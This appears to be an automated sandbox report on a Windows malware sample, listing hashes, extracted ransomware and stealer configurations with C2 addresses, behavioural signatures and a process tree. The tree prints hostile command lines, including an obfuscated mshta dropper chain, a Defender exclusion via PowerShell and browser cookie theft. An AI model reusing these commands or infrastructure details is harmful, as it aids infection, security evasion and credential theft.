Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1275s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (18).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? payfast290@mail2tor.com TELEGRAM @ payfast290 Your personal ID: 106-7DA-F8B Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 24 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 25 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 43 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 29 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 34 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 56 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:2656
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:4532
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2436
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2428
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2320
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2272
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1864
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1456
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1396
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1288
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1148
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:1064
                    • C:\ProgramData\qifjdtl\ogbsoj.exe
                      C:\ProgramData\qifjdtl\ogbsoj.exe start
                      2⤵
                        PID:6384
                      • C:\Users\Admin\AppData\Roaming\bufaghe
                        C:\Users\Admin\AppData\Roaming\bufaghe
                        2⤵
                          PID:8260
                        • C:\Users\Admin\AppData\Roaming\edfaghe
                          C:\Users\Admin\AppData\Roaming\edfaghe
                          2⤵
                            PID:9052
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:352
                          • C:\Users\Admin\AppData\Local\Temp\Setup (18).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:656
                            • C:\Users\Admin\Documents\Hooe672OqdQEz4Znx7iSvZOE.exe
                              "C:\Users\Admin\Documents\Hooe672OqdQEz4Znx7iSvZOE.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3668
                              • C:\Windows\SysWOW64\rundll32.exe
                                C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\HOOE67~1.DLL,s C:\Users\Admin\DOCUME~1\HOOE67~1.EXE
                                3⤵
                                • Blocklisted process makes network request
                                • Loads dropped DLL
                                PID:7276
                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\HOOE67~1.DLL,YFkHSA==
                                  4⤵
                                  • Blocklisted process makes network request
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  • Modifies system certificate store
                                  PID:7772
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\HOOE67~1.DLL
                                    5⤵
                                      PID:8512
                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\HOOE67~1.DLL,YBRL
                                      5⤵
                                      • Loads dropped DLL
                                      • Suspicious use of SetThreadContext
                                      • Checks processor information in registry
                                      PID:5952
                                      • C:\Windows\system32\rundll32.exe
                                        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                        6⤵
                                        • Suspicious use of FindShellTrayWindow
                                        PID:7144
                                        • C:\Windows\system32\ctfmon.exe
                                          ctfmon.exe
                                          7⤵
                                            PID:8444
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp1E98.tmp.ps1"
                                        5⤵
                                          PID:3160
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            6⤵
                                              PID:1036
                                    • C:\Users\Admin\Documents\1a1m9aAFlQn4YP10h3KeKWnZ.exe
                                      "C:\Users\Admin\Documents\1a1m9aAFlQn4YP10h3KeKWnZ.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:4080
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 664
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4996
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 672
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4488
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 676
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4652
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 684
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4876
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 884
                                        3⤵
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5040
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 1068
                                        3⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1852
                                    • C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe
                                      "C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:3648
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                        3⤵
                                          PID:4676
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\7GDU9OSLAivD45PaJ_Np6yTw.exe" ) do taskkill -IM "%~nXW" -f
                                            4⤵
                                              PID:5344
                                              • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                5⤵
                                                • Executes dropped EXE
                                                PID:5760
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                  6⤵
                                                    PID:6996
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                      7⤵
                                                        PID:1160
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                      6⤵
                                                      • Loads dropped DLL
                                                      PID:7944
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill -IM "7GDU9OSLAivD45PaJ_Np6yTw.exe" -f
                                                    5⤵
                                                    • Kills process with taskkill
                                                    PID:5828
                                            • C:\Users\Admin\Documents\CLgPUq5AVvZwY3l8lxZ97G9O.exe
                                              "C:\Users\Admin\Documents\CLgPUq5AVvZwY3l8lxZ97G9O.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:412
                                            • C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe
                                              "C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4048
                                              • C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe
                                                "C:\Users\Admin\Documents\J6iNDogrvenIPg_ZJWx6UAoJ.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4720
                                            • C:\Users\Admin\Documents\mMYCkNeRpztI34hbp8udunJt.exe
                                              "C:\Users\Admin\Documents\mMYCkNeRpztI34hbp8udunJt.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: MapViewOfSection
                                              PID:1596
                                            • C:\Users\Admin\Documents\w5imdGd9mfkpFoQNpJG6TmYK.exe
                                              "C:\Users\Admin\Documents\w5imdGd9mfkpFoQNpJG6TmYK.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:2832
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 760
                                                3⤵
                                                • Program crash
                                                PID:5556
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 784
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5736
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 812
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5892
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 824
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6036
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 956
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5580
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 984
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6028
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1004
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5400
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1084
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4208
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1436
                                                3⤵
                                                • Program crash
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6476
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1472
                                                3⤵
                                                • Program crash
                                                PID:6752
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1480
                                                3⤵
                                                • Program crash
                                                PID:6932
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1676
                                                3⤵
                                                • Program crash
                                                PID:6448
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1636
                                                3⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Program crash
                                                PID:6928
                                            • C:\Users\Admin\Documents\po04WAP4mZxGKoA0vPcy97Tk.exe
                                              "C:\Users\Admin\Documents\po04WAP4mZxGKoA0vPcy97Tk.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:416
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0670795689.exe"
                                                3⤵
                                                  PID:4932
                                                  • C:\Users\Admin\AppData\Local\Temp\0670795689.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\0670795689.exe"
                                                    4⤵
                                                      PID:2204
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0008172018.exe"
                                                    3⤵
                                                      PID:6256
                                                      • C:\Users\Admin\AppData\Local\Temp\0008172018.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\0008172018.exe"
                                                        4⤵
                                                          PID:6568
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 744
                                                            5⤵
                                                            • Program crash
                                                            PID:1776
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 732
                                                            5⤵
                                                            • Program crash
                                                            PID:8120
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 764
                                                            5⤵
                                                            • Program crash
                                                            PID:5884
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 740
                                                            5⤵
                                                            • Program crash
                                                            PID:4292
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 876
                                                            5⤵
                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                            • Program crash
                                                            PID:7432
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "po04WAP4mZxGKoA0vPcy97Tk.exe" /f & erase "C:\Users\Admin\Documents\po04WAP4mZxGKoA0vPcy97Tk.exe" & exit
                                                        3⤵
                                                          PID:6552
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im "po04WAP4mZxGKoA0vPcy97Tk.exe" /f
                                                            4⤵
                                                            • Kills process with taskkill
                                                            PID:5556
                                                      • C:\Users\Admin\Documents\1GK5k3xmn3O_fPhUrAXhez54.exe
                                                        "C:\Users\Admin\Documents\1GK5k3xmn3O_fPhUrAXhez54.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2724
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "1GK5k3xmn3O_fPhUrAXhez54.exe" /f & erase "C:\Users\Admin\Documents\1GK5k3xmn3O_fPhUrAXhez54.exe" & exit
                                                          3⤵
                                                            PID:5952
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im "1GK5k3xmn3O_fPhUrAXhez54.exe" /f
                                                              4⤵
                                                              • Kills process with taskkill
                                                              PID:5924
                                                        • C:\Users\Admin\Documents\yoC0SuaMrORdRlbsDHFHyeUd.exe
                                                          "C:\Users\Admin\Documents\yoC0SuaMrORdRlbsDHFHyeUd.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          PID:1156
                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                            3⤵
                                                              PID:4640
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:5376
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:5836
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:6100
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                4⤵
                                                                  PID:2204
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  4⤵
                                                                    PID:6324
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                    4⤵
                                                                      PID:6424
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      4⤵
                                                                        PID:6832
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                        4⤵
                                                                          PID:6880
                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4724
                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:4764
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          4⤵
                                                                            PID:5048
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:6120
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                              PID:10488
                                                                        • C:\Users\Admin\Documents\Jio2aWKJp8cWMZdrGeQ8KEbN.exe
                                                                          "C:\Users\Admin\Documents\Jio2aWKJp8cWMZdrGeQ8KEbN.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1328
                                                                        • C:\Users\Admin\Documents\sJmbQWB0NpkfM_pWcJqhL9vW.exe
                                                                          "C:\Users\Admin\Documents\sJmbQWB0NpkfM_pWcJqhL9vW.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3420
                                                                        • C:\Users\Admin\Documents\mG4d8IwTgRrAL4FE5iY8YRB7.exe
                                                                          "C:\Users\Admin\Documents\mG4d8IwTgRrAL4FE5iY8YRB7.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:940
                                                                        • C:\Users\Admin\Documents\gAScRkDwlUWDTNNmOfKcnrA7.exe
                                                                          "C:\Users\Admin\Documents\gAScRkDwlUWDTNNmOfKcnrA7.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3732
                                                                        • C:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exe
